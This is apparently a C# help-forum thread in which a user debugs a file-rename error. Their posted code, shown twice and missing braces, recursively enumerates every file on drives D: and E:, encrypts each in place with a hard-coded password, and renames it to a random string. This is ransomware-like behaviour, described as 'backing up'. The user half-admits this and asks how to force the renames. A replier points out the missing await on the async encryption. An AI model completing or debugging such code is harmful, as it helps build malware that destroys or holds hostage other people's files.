C#ā€¢14mo ago

Cannot access file because it's being used by another process

I am getting the following error when I try to run my program: System.IO.IOException: 'The process cannot access the file because it is being used by another process.' I googled around and most suggestions want you to close the file stream when you are done with a file however the files that I am triyng to rename don't have a close method. Here is my code:
var output = @"E:\demo.txt";
var ext = RandomStringNS(12) + " - REST Database";
Microsoft.VisualBasic.FileIO.FileSystem.RenameFile(output, ext);
var output = @"E:\demo.txt";
var ext = RandomStringNS(12) + " - REST Database";
Microsoft.VisualBasic.FileIO.FileSystem.RenameFile(output, ext);
So when I run this on a directory, it works on the first and sometimes the second file until something gets in the way. So what I need to do is force my program to rename files. Any solutions to this?
5 Replies
Ristā€¢14mo ago
You sure you're not reading the files you just renamed while iterating over the directory? And that you don't have any files open in another program?
c0nstantā€¢14mo ago
I am iterating through two my of disks and then backing up all files:
string[] diskList = {"D:\\", "E:\\"};
foreach (string item in diskList)
string[] files = EnumerateFilesRecursive(item).ToArray();
foreach (string file in files)
var key = "my weak password";
var output = file;
Console.WriteLine(FileEncryptor.EncryptAsync(file, file, key));

var ext = RandomStringNS(12) + " - REST Database";
Microsoft.VisualBasic.FileIO.FileSystem.RenameFile(output, ext);

string[] diskList = {"D:\\", "E:\\"};
foreach (string item in diskList)
string[] files = EnumerateFilesRecursive(item).ToArray();
foreach (string file in files)
var key = "my weak password";
var output = file;
Console.WriteLine(FileEncryptor.EncryptAsync(file, file, key));

var ext = RandomStringNS(12) + " - REST Database";
Microsoft.VisualBasic.FileIO.FileSystem.RenameFile(output, ext);

The encrypt method here does have Close(); implemented like at the end of it, I found the implementation from here so I just added close methods at the end of the method: https://stackoverflow.com/questions/17627326/aes-256-file-encryption-c-sharp I was thinking that maybe the Microsoft's RenameFile method has a close option or maybe it opens the file and then I can close it somehow
Ristā€¢14mo ago
You're not awaiting it though and it's async
c0nstantā€¢14mo ago
Yes, it is, so what should I do here? Yeah, kind of... šŸ˜› but no serriously, how do I do this? I will come back with a solution then šŸ˜¦
Scratchā€¢14mo ago
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